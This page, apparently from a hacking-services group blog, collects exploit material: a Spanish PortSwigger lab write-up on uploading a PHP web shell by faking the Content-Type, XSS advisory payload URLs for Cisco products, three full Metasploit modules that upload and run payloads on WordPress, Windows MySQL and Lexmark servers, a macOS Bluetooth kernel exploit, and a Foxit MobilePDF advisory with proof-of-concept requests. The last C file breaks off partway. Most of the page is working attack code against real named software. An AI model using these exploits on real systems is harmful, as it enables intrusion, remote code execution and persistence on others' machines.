Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863128687

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking

En este post vamos a estar resolviendo el laboratorio de PortSwigger: “Web shell upload via Content-Type restriction bypass”.

image 209

Para resolver el laboratorio tenemos que subir un archivo PHP que lea y nos muestre el contenido del archivo /home/carlos/secret. Ya que para demostrar que hemos completado el laboratorio, deberemos introducir el contenido de este archivo.

Además, el servidor está configurado para prevenir la subida de archivos según el Content-Type. Por lo que tendremos que bypasear esta defensa.

En este caso, el propio laboratorio nos proporciona una cuenta para iniciar sesión, por lo que vamos a hacerlo:

image 210
image 211

Una vez hemos iniciado sesión, nos encontramos con el perfil de la cuenta:

image 212

Como podemos ver, tenemos una opción para subir archivo, y concretamente parece ser que se trata de actualizar el avatar del perfil. Vamos a intentar aprovecharnos de esta opción para subir el siguiente archivo PHP:

image 213

Antes que nada, vamos a preparar Burp Suite para que intercepte la petición:

image 214
image 215

Una vez tenemos Burp Suite listo junto al proxy, seleccionamos el archivo y le damos a “Upload”:

image 216
image 217
image 218

Aquí Burp Suite interceptará la petición de subida del archivo:

image 219

Vamos a mandar la petición al repeater para tratar con ella mejor, para ello, pulsamos Ctrl R.

Una vez en el repeater, cuando le damos a “Send”, podemos ver la respuesta a la subida del archivo por parte del servidor:

image 220

En este caso, indica que los archivos cuya cabecera Content-Type sea application/x-php no están permitidos. Y que solo están permitidos los que sea image/jpeg o image/png.

Sabiendo el tipo de restricción que nos está implantando el servidor, simplemente podemos cambiar el Content-Type de nuestra petición:

image 221
image 222

Con esto, el contenido del archivo no cambia, y tampoco afectará a que se interprete. Con este cambio, volvemos a intentar la subida del archivo:

image 223

Esta vez vemos que se ha subido correctamente. Podemos ver esta respuesta en el navegador de la siguiente forma:

image 224
image 225
image 226
image 227

Una vez llegados aquí, ya podemos desactivar el Burp Suite, ya que no haremos más uso de él.

image 228

Con esto, volvemos a nuestro perfil.

image 229

Ahora, si nos fijamos en el perfil, podemos ver como el avatar ha cambiado, y ahora muestra un fallo de que no carga bien la imagen:

image 230

Dándole click derecho, podemos irnos a la ruta directa de la imagen para ver si se trata de nuestro archivo PHP:

image 231
image 232

Efectivamente, el archivo PHP que hemos subido se ha almacenado como el archivo del avatar, por eso no cargaba en el perfil, intentaba cargar una imagen cuando no lo era. Al visitar el archivo PHP, se ha interpretado el código que hemos colocado, y conseguimos leer el archivo secret.

Habiendo leído este archivo, ya simplemente entregamos la respuesta:

image 233
image 234

Y de esta forma, completamos el laboratorio:

image 235
image 236

HireHackking 
source: https://www.securityfocus.com/bid/47903/info

Cisco Unified Operations Manager is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

This issue is being tracked by Cisco Bug ID CSCto12712.

Cisco Unified Operations Manager versions prior to 8.6 are vulnerable. 

http://www.example.com/CSCOnm/servlet/com.cisco.nm.help.ServerHelpEngine?tag=Portal_introductionhomepage61a8b"%3balert(1)
HireHackking 
source: https://www.securityfocus.com/bid/47902/info

CiscoWorks Common Services is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.

Exploiting this vulnerability could allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and launch other attacks.

This issue is being monitored by Cisco Bug ID CSCto12704.

CiscoWorks Common Services 3.3 and prior are vulnerable. 

http://www.example.com/cwhp/device.center.do?device=&72a9f"><script>alert(1)</script>5f5251aaad=1
HireHackking 
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  include Msf::HTTP::Wordpress

  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'WordPress WP Symposium 14.11 Shell Upload',
      'Description'     => %q{WP Symposium Plugin for WordPress contains a
                              flaw that allows a remote attacker to execute
                              arbitrary PHP code. This flaw exists because the
                              /wp-symposium/server/file_upload_form.php script
                              does not properly verify or sanitize
                              user-uploaded files. By uploading a .php file,
                              the remote system will place the file in a
                              user-accessible path. Making a direct request to
                              the uploaded file will allow the attacker to
                              execute the script with the privileges of the
                              web server.},
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Claudio Viviani',                # Vulnerability disclosure
          'Rob Carr <rob[at]rastating.com>' # Metasploit module
        ],
      'References'      =>
        [
          ['OSVDB', '116046'],
          ['WPVDB', '7716']
        ],
      'DisclosureDate'  => 'Dec 11 2014',
      'Platform'        => 'php',
      'Arch'            => ARCH_PHP,
      'Targets'         => [['wp-symposium < 14.12', {}]],
      'DefaultTarget'   => 0
    ))
  end

  def check
    check_plugin_version_from_readme('wp-symposium', '14.12')
  end

  def generate_mime_message(payload, payload_name, directory_name, symposium_url)
    data = Rex::MIME::Message.new
    data.add_part('1', nil, nil, 'form-data; name="uploader_uid"')
    data.add_part("./#{directory_name}/", nil, nil, 'form-data; name="uploader_dir"')
    data.add_part(symposium_url, nil, nil, 'form-data; name="uploader_url"')
    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"files[]\"; filename=\"#{payload_name}\"")
    data
  end

  def exploit
    print_status("#{peer} - Preparing payload")
    unique_name = Rex::Text.rand_text_alpha(10)
    payload_name = "#{unique_name}.php"
    symposium_url = normalize_uri(wordpress_url_plugins, 'wp-symposium', 'server', 'php')
    payload_url = normalize_uri(symposium_url, unique_name, payload_name)
    data = generate_mime_message(payload, payload_name, unique_name, symposium_url)
    symposium_url = normalize_uri(symposium_url, 'index.php')

    print_status("#{peer} - Uploading payload to #{payload_url}")
    res = send_request_cgi(
      'method'  => 'POST',
      'uri'     => symposium_url,
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => data.to_s
    )

    if res && res.code == 200 && res.body.length > 0 && !res.body.include?('error') && res.body != '0'
      print_good("#{peer} - Uploaded the payload")
      register_files_for_cleanup(payload_name)

      print_status("#{peer} - Executing the payload...")
      send_request_cgi(
      {
        'uri'     => payload_url,
        'method'  => 'GET'
      }, 5)
      print_good("#{peer} - Executed payload")
    else
      if res.nil?
        fail_with(Failure::Unreachable, "No response from the target")
      else
        vprint_error("#{peer} - HTTP Status: #{res.code}")
        vprint_error("#{peer} - Server returned: #{res.body}")
        fail_with(Failure::UnexpectedReply, "Failed to upload the payload")
      end
    end
  end
end
HireHackking 
##
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::MYSQL
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle MySQL for Microsoft Windows FILE Privilege Abuse',
      'Description'    => %q{
        This module takes advantage of a file privilege misconfiguration problem
        specifically against Windows MySQL servers. This module abuses the FILE
        privilege to write a payload to Microsoft's All Users Start Up directory
        which will execute every time a user logs in. The default All Users Start
        Up directory used by the module is Windows 7 friendly.
      },
      'Author'         =>
        [
          'sinn3r',
          'Sean Verity <veritysr1980[at]gmail.com'
        ],
      'DefaultOptions' =>
        {
          'DisablePayloadHandler' =>  'true'
        },
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2012-5613'], #DISPUTED
          ['OSVDB', '88118'],
          ['EDB', '23083'],
          ['URL', 'http://seclists.org/fulldisclosure/2012/Dec/13']
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'MySQL on Windows', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 01 2012'
    ))

    register_options(
      [
        OptString.new('USERNAME', [ true, 'The username to authenticate as']),
        OptString.new('PASSWORD', [ true, 'The password to authenticate with']),
        OptString.new('STARTUP_FOLDER', [ true, 'The All Users Start Up folder', '/programdata/microsoft/windows/start menu/programs/startup/'])
      ])
  end

  def check
    m = mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
    return Exploit::CheckCode::Safe unless m

    return Exploit::CheckCode::Appears if is_windows?

    Exploit::CheckCode::Safe
  end

  def peer
    "#{rhost}:#{rport}"
  end

  def query(q)
    rows = []

    begin
      res = mysql_query(q)
      return rows unless res
      res.each_hash do |row|
        rows << row
      end
    rescue RbMysql::ParseError
      return rows
    end

    rows
  end

  def is_windows?
    r = query("SELECT @@version_compile_os;")
    r[0]['@@version_compile_os'] =~ /^Win/ ? true : false
  end

  def get_drive_letter
    r = query("SELECT @@tmpdir;")
    drive = r[0]['@@tmpdir'].scan(/^(\w):/).flatten[0] || ''

    drive
  end

  def upload_file(bin, dest)
    p = bin.unpack("H*")[0]
    query("SELECT 0x#{p} into DUMPFILE '#{dest}'")
  end

  def exploit
    unless datastore['STARTUP_FOLDER'].start_with?('/') && datastore['STARTUP_FOLDER'].end_with?('/')
      fail_with(Failure::BadConfig, "STARTUP_FOLDER should start and end with '/' Ex: /programdata/microsoft/windows/start menu/programs/startup/")
    end

    print_status("#{peer} - Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
    begin
      m = mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
    rescue RbMysql::AccessDeniedError
      fail_with(Failure::NoAccess, "#{peer} - Access denied")
    end

    fail_with(Failure::NoAccess, "#{peer} - Unable to Login") unless m

    unless is_windows?
      fail_with(Failure::NoTarget, "#{peer} - Remote host isn't Windows")
    end

    begin
      drive = get_drive_letter
    rescue RbMysql::ParseError
      fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name")
    end

    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name") unless drive

    exe_name = Rex::Text::rand_text_alpha(5) + ".exe"
    dest     = "#{drive}:#{datastore['STARTUP_FOLDER']}#{exe_name}"
    exe      = generate_payload_exe

    print_status("#{peer} - Uploading to '#{dest}'")
    begin
      upload_file(exe, dest)
    rescue RbMysql::AccessDeniedError
      fail_with(Failure::NotVulnerable, "#{peer} - No permission to write. I blame kc :-)")
    end
    register_file_for_cleanup("#{dest}")
  end

end
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'Lexmark MarkVision Enterprise Arbitrary File Upload',
      'Description'   => %q{
        This module exploits a code execution flaw in Lexmark MarkVision Enterprise before 2.1.
        A directory traversal in the GfdFileUploadServlet servlet allows an unauthenticated
        attacker to upload arbitrary files, including arbitrary JSP code. This module has been
        tested successfully on Lexmark MarkVision Enterprise 2.0 with Windows 2003 SP2.
      },
      'Author'        =>
        [
          'Andrea Micalizzi', # Vulnerability Discovery
          'juan vazquez' # Metasploit module
        ],
      'License'       => MSF_LICENSE,
      'References'    =>
        [
          ['CVE', '2014-8741'],
          ['ZDI', '14-410'],
          ['URL', 'http://support.lexmark.com/index?page=content&id=TE666&locale=EN&userlocale=EN_US']
        ],
      'Privileged'    => true,
      'Platform'      => 'win',
      'Arch'          => ARCH_JAVA,
      'Targets'       =>
        [
          [ 'Lexmark Markvision Enterprise 2.0', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 09 2014'))

    register_options(
      [
        Opt::RPORT(9788),
        OptString.new('TARGETURI', [true, 'ROOT path', '/'])
      ], self.class)
  end

  def check
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path.to_s, 'mve', 'help', 'en', 'inventory', 'am_about.html')
    })

    version = nil
    if res && res.code == 200 && res.body && res.body.to_s =~ /MarkVision Enterprise ([\d\.]+)/
      version = $1
    else
      return Exploit::CheckCode::Unknown
    end

    if Gem::Version.new(version) <= Gem::Version.new('2.0.0')
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    jsp_leak = jsp_path
    jsp_name_leak = "#{rand_text_alphanumeric(4 + rand(32 - 4))}.jsp"
    # By default files uploaded to C:\Program Files\Lexmark\Markvision Enterprise\apps\library\gfd-scheduled
    # Default app folder on C:\Program Files\Lexmark\Markvision Enterprise\tomcat\webappps\ROOT
    traversal_leak = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_name_leak}\x00.pdf"

    print_status("#{peer} - Uploading info leak JSP #{jsp_name_leak}...")
    if upload_file(traversal_leak, jsp_leak)
      print_good("#{peer} - JSP successfully uploaded")
    else
      fail_with(Failure::Unknown, "#{peer} - JSP upload failed")
    end

    res = execute(jsp_name_leak)

    if res && res.code == 200 && res.body.to_s !~ /null/ && res.body.to_s =~ /Path:(.*)/
      upload_path = $1
      print_good("#{peer} - Working directory found in #{upload_path}")
      register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_name_leak))
    else
      print_error("#{peer} - Couldn't retrieve the upload directory, manual cleanup will be required")
    end

    jsp_payload_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
    jsp_payload = payload.encoded
    traversal_payload = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_payload_name}\x00.pdf"

    print_status("#{peer} - Uploading JSP payload #{jsp_payload_name}...")
    if upload_file(traversal_payload, jsp_payload)
      print_good("#{peer} - JSP successfully uploaded")
      register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_payload_name)) if upload_path
    else
      fail_with(Failure::Unknown, "#{peer} - JSP upload failed")
    end

    print_status("#{peer} - Executing payload...")
    execute(jsp_payload_name, 3)
  end

  def upload_file(filename, contents)
    good_signature = rand_text_alpha(4 + rand(4))
    bad_signature = rand_text_alpha(4 + rand(4))

    post_data = Rex::MIME::Message.new
    post_data.add_part(good_signature, nil, nil, 'form-data; name="success"')
    post_data.add_part(bad_signature, nil, nil, 'form-data; name="failure"')
    post_data.add_part(contents, 'application/octet-stream', nil, "form-data; name=\"datafile\"; filename=\"#{filename}\"")

    res = send_request_cgi(
      {
        'uri'    => normalize_uri(target_uri.path, 'mve', 'upload', 'gfd'),
        'method' => 'POST',
        'data'   => post_data.to_s,
        'ctype'  => "multipart/form-data; boundary=#{post_data.bound}"
      })

    if res && res.code == 200 && res.body && res.body.to_s.include?(good_signature)
      return true
    else
      return false
    end
  end

  def execute(jsp_name, time_out = 20)
    res = send_request_cgi({
      'uri'    => normalize_uri(target_uri.path.to_s, jsp_name),
      'method' => 'GET'
    }, time_out)

    res
  end

  def jsp_path
    jsp =<<-EOS
<%@ page language="Java" import="java.util.*"%>
<%
out.println("Path:" + System.getProperty("catalina.home"));
%>
    EOS

    jsp
  end

end
HireHackking 
/*
 * lpe-issue1.c
 * Written for Mac OS X Yosemite (10.10.1) by @joystick and @rpaleari.
 *
 * Exploits IOBluetoothHCIUserClient::DispatchHCIWriteStoredLinkKey()
 *
 * gcc -Wall -o lpe-issue1{,.c} -framework IOKit
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <mach/mach.h>
#include <mach/vm_map.h>

#include <IOKit/IOKitLib.h>

#define SIZE 0x1000

struct BluetoothCall {
  uint64_t args[7];
  uint64_t sizes[7];
  uint64_t index;
};

#ifndef bswap64
#   define bswap64(num)							\
  ( (((uint64_t)(num) << 56)                               )		\
    | (((uint64_t)(num) << 40) & UINT64_C(0x00FF000000000000))		\
    | (((uint64_t)(num) << 24) & UINT64_C(0x0000FF0000000000))		\
    | (((uint64_t)(num) <<  8) & UINT64_C(0x000000FF00000000))		\
    | (((uint64_t)(num) >>  8) & UINT64_C(0x00000000FF000000))		\
    | (((uint64_t)(num) >> 24) & UINT64_C(0x0000000000FF0000))		\
    | (((uint64_t)(num) >> 40) & UINT64_C(0x000000000000FF00))		\
    | (((uint64_t)(num) >> 56)                               ) )
#endif

void create_requests(io_connect_t port)
{
  struct BluetoothCall a;
  uint32_t i;
  kern_return_t kr;

  for (i = 0; i < 7; i++) {
    a.args[i] = (uint64_t) calloc(SIZE, sizeof(char));
    a.sizes[i] = SIZE;
  }

  /* DispatchHCIRequestCreate() */
  a.index = 0x0;

  *(uint64_t *)a.args[0] = 5*1000;  /* Timeout */
  memset((void *)a.args[1], 0x81, 0x1000);
  memset((void *)a.args[2], 0x82, 0x1000);
  memset((void *)a.args[3], 0x83, 0x1000);
  memset((void *)a.args[4], 0x84, 0x1000);
  memset((void *)a.args[5], 0x85, 0x1000);
  memset((void *)a.args[6], 0x86, 0x1000);

  for(i = 0; i < 500; i++) {
    kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
			     (uint32_t) 0,       /* Selector */
			     NULL, 0,            /* input, inputCnt */
			     (const void*) &a,   /* inputStruct */
			     120,                /* inputStructCnt */
			     NULL, NULL, NULL, NULL); /* Output stuff */

    if(kr == 0xe00002bd) /* Full */
      break;
  }
}

int main(void) {
  struct BluetoothCall a;
  int i;
  void *landing_page = calloc(SIZE, sizeof(char));

  /* Init a */
  for (i = 0; i < 7; i++) {
    a.args[i] = (uint64_t) calloc(SIZE, sizeof(char));
    a.sizes[i] = SIZE;
  }

  /* Finding vuln service */
  io_service_t service =
    IOServiceGetMatchingService(kIOMasterPortDefault,
				IOServiceMatching("IOBluetoothHCIController"));

  if (!service) {
    return -1;
  }

  /* Connect to vuln service */
  io_connect_t port = (io_connect_t) 0;
  kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
  IOObjectRelease(service);
  if (kr != kIOReturnSuccess) {
    return kr;
  }

  /* Populating with fake requests. */
  create_requests(port);

  /* IOBluetoothHCIUserClient::DispatchHCIWriteStoredLinkKey() */
  a.index = 42;
  /* Req number */
  *((uint32_t *)a.args[0]) = 1;
  /* num_of_keys */
  *((uint32_t *)a.args[1]) = 0x20;

  /* Padding */
  memset((void *)a.args[3], 0x33, 152);
  /* mov     rdi, [r14+0AB8h] */
  *((uint64_t *)(a.args[3]+152)) = bswap64((uint64_t)landing_page);
  /* mov rax, [rdi] */
  *((uint64_t *)((uint64_t)landing_page)) = (uint64_t)landing_page;
  /* call [rax+0x1d0]: this will trigger a #GP calling 0x4141414142424242 */
  *((uint64_t *)((uint64_t)landing_page+0x1d0)) = (uint64_t) 0x4141414142424242;

  /* Here some fixing to the vtable is required to return cleanly after the exploit */

#if 0
  /* Debug print */
  for(i = 0; i < 120; i++) {
    if(i % 8 == 0) printf("\n");
    printf("\\x%02x", ((unsigned char *)&a)[i]);
  }
  printf("\n");
#endif

  kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
			   (uint32_t) 0,       /* Selector */
			   NULL, 0,            /* input, inputCnt */
			   (const void*) &a,   /* inputStruct */
			   120,                /* inputStructCnt */
			   NULL, NULL, NULL, NULL); /* Output stuff */
  printf("kr: %08x\n", kr);

  return IOServiceClose(port);
}
HireHackking 
Document Title:
===============
Foxit MobilePDF v4.4.0 iOS - Multiple Web Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1400


Release Date:
=============
2015-01-12


Vulnerability Laboratory ID (VL-ID):
====================================
1400


Common Vulnerability Scoring System:
====================================
6.9


Product & Service Introduction:
===============================
Foxit MobilePDF enables you to view and annotate PDF documents on the go, allowing you to work on your PDF documents anytime, anywhere.
Specify the permissions to restrict operations to PDF files, such as copying content, adding annotation, managing page & bookmark, and printing.
Share, store and synchronize PDF files.

(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/foxit-mobile-pdf/id507040546 )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the  official Foxit MobilePDF v4.4.0 iOS mobile web-application.


Vulnerability Disclosure Timeline:
==================================
2015-01-12:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Foxit Corporation
Product: MobilePDF - iOS Web Application (Wifi) 4.4.0


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official Foxit MobilePDF v4.4.0 iOS mobile web-application.
The local file include vulnerability allows remote attackers to unauthorized include local file/path requests or system specific 
path commands to compromise the mobile web-application.

The vulnerability is located in the `filename` value of the wifi interface `upload` module. Local attackers are able to manipulate the 
wifi web interface by usage of the vulnerable `upload` POST method request.  The service does not encode or parse the `filename` context 
on uploads. Attackers can include an existing local application path or an existing local device path as source in connection with script 
code to compromise the iOS app. The execution of unauthorized local file or path request occurs in the index of documents module of the 
wifi file service application after the inject. The request method to inject is POST and the attack vector is located on the application-side 
of the affected iOS application.

The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9. 
Exploitation of the local file include web vulnerability in the upload module requires no user interaction or privileged web-application user account. 
Successful exploitation of the local file include web vulnerability results in mobile application compromise or compromised device components.

Vulnerable Method(s):
				[+] POST

Vulnerable Module(s):
				[+] Upload

Vulnerable Parameter(s):
				[+] filename (name)

Affected Module(s):
				[+] Index of Documents (http://localhost:8888)



1.2
An arbitrary file upload web vulnerability has been discovered in the official Foxit MobilePDF v4.4.0 iOS mobile web-application.
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the system validation and compromise the web-server.

The vulnerability is located in the filename value of the `upload` file module. Remote attackers are able to upload a php or js web-shell by a rename of the 
filename with multiple extensions in the upload POST method request. The attacker uploads for example a web-shell with the following name and extension 
`pentest.png.html.php.js.aspx.png`. After the upload the attacker needs to open the file in the wifi web-application interface. He deletes the .png file 
extension and can access the webshell with elevated access rights to execute. 

The security risk of the arbitrary file upload web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.6.
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password.
Successful exploitation of the arbitrary file upload vulnerability results in unauthorized file access (aap/device) and compromise of http web-server.


Request Method(s):
				[+] [POST]

Vulnerable Module(s):
				[+] Upload

Vulnerable Parameter(s):
				[+] filename  (multiple extensions)

Affected Module(s):
				[+] Index of Documents (http://localhost:8888)


Proof of Concept (PoC):
=======================
1.1
The local file include vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Download and install the FoxIT MobilePDF iOS application
2. Surf to the Documents Index of the Wifi Server (http://localhost:8888)
3. Start to choose a file for the upload function by usage of the search
4. Intercept the session by usage of a tamper and change the name value to the local device path source
5. Continue the request and save the settings. After that go back to the Index of Documents
Note: The execution of the script code occurs in the vulnerable name value of the index file dir list
6. Successful reproduce of the security vulnerability!

PoC: Index of Documents (Name)
<tr><td><a href="/<img src="><img src="./[LOCAL FILE INCLUDE VULNERABILITY!]</a"></a></td><td align="center">file</td>
<td align="center"><span class="m">2015-01-10 13:49</span></td><td align="center"><span class="s">538 B</span></td></tr>

--- PoC Session Logs [POST] (File Include > Upload)---
Status: 200[OK]
POST http://localhost:8888/ Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[3624] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost:8888]
      User-Agent
[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]    
  Referer[http://localhost:8888/]
      Connection[keep-alive]
   POST-Daten:
      POST_DATA[-----------------------------3796507625132
Content-Disposition: form-data; name="button"; 
filename="./[LOCAL FILE INCLUDE VULNERABILITY!]+2.png" 
Content-Type: image/png

--- PoC Session Logs [GET] (File Dir Index List)---
13:54:26.427[48ms][total 48ms] Status: 200[OK]
GET http://localhost:8888/%3C/./[LOCAL FILE INCLUDE VULNERABILITY!] Load Flags[LOAD_NORMAL] Größe des Inhalts[142] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost:8888]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0]
      Accept[image/png,image/*;q=0.8,*/*;q=0.5]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]  
    Referer[http://localhost:8888/]
      Connection[keep-alive]
   Response Header:
      Accept-Ranges[bytes]
      Content-Length[142]
      Date[Sa., 10 Jan. 2015 12:49:30 GMT]

Reference(s):
http://localhost:8888/
http://localhost:8888/%3C/./



1.2
The arbitrary file upload vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

PoC: URL
http://localhost:8888/./webshell.png.html.php

PoC: Index of Documents
<tr><td><a href="/webshell.png.html.php.js.png">webshell.png.html.php.js.png</a></td>
<td align="center">file</td><td align="center"><span class="m">2015-01-10 13:58</span></td>
<td align="center"><span class="s">538 B</span></td></tr>

--- PoC Session Logs [POST] ---
14:03:16.481[149ms][total 1583ms] Status: 200[OK]
POST http://localhost:8888/ Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[3883] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost:8888]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://localhost:8888/]
      Connection[keep-alive]
   POST-Daten:
      POST_DATA[-----------------------------282243582256
Content-Disposition: form-data; name="button"; filename="webshell.png.html.php.js.png"
Content-Type: image/png

Reference(s):
http://localhost:8888/
http://localhost:8888/./webshell.png.html.php


Solution - Fix & Patch:
=======================
1.1
The file include vulnerability can be paütched by a secure parse and encode of the vulnerable `filename` value in the upload POST method request.
Restrict the filename input and filter with an own set exception to prevent application-side attacks.
Parse also in the Index of Documents the vulnerable name output value to solve the issue.

1.2
Restrict the vulnerable `filename` value and implement a secure filter mechanism with own exception to prevent the upload of files with multiple extensions.
Restrict the upload folder and disallow the execution of files that are already uploaded.


Security Risk:
==============
1.1
The security risk of the local file include web vulnerability in the upload POSt method request is estimated as high. (CVSS 6.9)

1.2
The security risk of the arbitrary file upload vulnerability in the upload POST method request is estimated as high. (CVSS 6.6)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]


-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
HireHackking 
/*
 * crash-issue3.c: Written for Mac OS X Yosemite (10.10) by @rpaleari and @joystick.
 *
 * Exploits a missing check in
 * IOBluetoothHCIController::TransferACLPacketToHW() to trigger a panic.
 *
 * gcc -Wall -o crash-issue3{,.c} -framework IOKit
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <mach/mach.h>
#include <mach/vm_map.h>

#include <IOKit/IOKitLib.h>

struct BluetoothCall {
  uint64_t args[7];
  uint64_t sizes[7];
  uint64_t index;
};

int main(void) {
  /* Finding vuln service */
  io_service_t service =
    IOServiceGetMatchingService(kIOMasterPortDefault,
				IOServiceMatching("IOBluetoothHCIController"));

  if (!service) {
    return -1;
  }

  /* Connect to vuln service */
  io_connect_t port = (io_connect_t) 0;
  kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
  IOObjectRelease(service);
  if (kr != kIOReturnSuccess) {
    return kr;
  }

